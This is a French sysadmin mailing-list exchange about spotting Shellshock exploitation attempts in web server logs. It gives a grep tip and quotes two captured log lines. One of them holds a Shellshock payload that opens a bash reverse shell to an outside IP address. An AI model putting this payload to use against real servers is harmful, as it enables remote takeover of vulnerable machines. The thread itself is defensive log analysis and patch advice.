Le 26 sept. 14 à 16:45, David Guyot a écrit :
Le vendredi 26 septembre 2014 à 16:38 +0200, daniel huhardeaux a écrit :Ah ? Si tu gères des serveurs web je te propose de faire un simple cat<fichier log serveur web>|grep "() {" et de compter le nombre de tentatives d'accès comme par exemple 89.207.135.125 - - [25/Sep/2014:12:06:47 +0200] "GET/cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;}; /bin/ ping-c 1 198.101.206.138" ou encore 202.38.120.248 213.239.227.108 - [26/Sep/2014:12:03:36 +0200] "GET / HTTP/1.0" 200 961 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'"
J'en ai aussi, mais pas autant que des exploits classiques sur des CMS vérolés.
Et comme ça tombe aussi dans les 404… Je ne me prends pas trop la tête avec.
D'accord avec Daniel sur ce point, d'autant plus que j'ai observé le second exemple de logs sur un de mes serveurs, ce qui correspond à une tentative d'implantation de porte dérobée —https://securelist.com/blog/research/66719/shellshock-and-its-early- adopters/
Attention, je n'ai pas écrit non plus de ne pas faire de m-à-j ! La publication de la faille va sûrement précipiter un paquets de gonziers à l'essayer un peu partout…
Cordialement. -- David Guyot Administrateur système, réseau et télécom / Sysadmin Europe Camions Interactive / Stockway Moulin Collot F-88500 Ambacourt 03 29 30 47 85